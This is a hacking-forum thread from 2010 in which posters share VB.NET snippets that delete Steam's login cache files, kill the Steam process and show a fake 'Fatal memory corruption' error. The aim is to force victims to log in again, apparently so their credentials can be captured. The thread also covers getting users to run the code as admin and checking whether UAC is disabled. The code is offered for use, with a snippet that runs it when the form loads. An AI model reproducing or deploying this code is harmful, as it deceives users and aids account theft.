This would trigger UAC, you better just delete the files in the steam folder.

* - 0xE9 - Apr 24, 2010

all they have to do is run it as admin, not that hard to make them do.

* - Joler1302 - Apr 24, 2010

No, but anyways :D Just gonan write a snippet to force login with deleting files, and then post here.

Yeah korrupt or the .blob and the .vdf shud do it

Code
Sub fucksteam()
        Try
            Dim Path As String = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) & "\Steam\config\SteamAppData.vdf"

            If IO.File.Exists(Path) = True Then
                IO.File.Delete(Path)
            End If
        Catch ex As Exception
        End Try

        Try
            Dim st As String
            st = Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Valve\Steam", "InstallPath", Nothing)
            Kill(st & "ClientRegistry.blob")
        Catch ex As Exception
        End Try
    End Sub

just found that creds to korrupt and dun o how for the .blob well :) hope it helps :D

Yea, i just wrote a snippet too.

Code
Public Sub ForceSteamLogin()
        On Error Resume Next
        Dim steampath As String = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) & "\Steam"
        Dim configpath As String = steampath & "\config"
        Dim AppDataFile As String = configpath & "\SteamAppData.vdf"
        Dim ClientRegistry As String = steampath & "\ClientRegistry.blob"
        Dim pProcess() As Process = System.Diagnostics.Process.GetProcessesByName("steam")
        MsgBox("Fatal memory corruption!" & vbCrLf & "Steam is restarting.", MsgBoxStyle.Critical, "Steam - Error!")
        For Each p As Process In pProcess
            p.Kill()
        Next
        If IO.File.Exists(AppDataFile) Then
            IO.File.Delete(AppDataFile)
        End If
        If IO.File.Exists(ClientRegistry) Then
            IO.File.Delete(ClientRegistry)
        End If
        Me.Hide()
        Process.Start(steampath & "\steam.exe")
        End
    End Sub

Usage:
Code
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        ForceSteamLogin()
    End Sub

Enjoy.

* - Cunt - Apr 24, 2010

Wait hmm his might not be shorter but it doesnt need uac, only 1 bit i think cuz just deleting the vdf does not need uac and it works fine :) there is no need for others tbh :D

oh hawt >.< well, lets work out a way to require admin privleges?

* - Stylis - Apr 24, 2010

Code
Dim Coder As String = "DeadLine"

Like it :P

* - HeXploit - Apr 24, 2010

If I recall there's a UAC bypass lying around somewhere or you could check if UAC has been disabled before it runs.

Code
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System[EnableLUA]

Value    Meaning
0        UAC is Disabled
1        UAC is Enabled

I'm pretty sure CurrentUser does not trigger UAC? 🤣
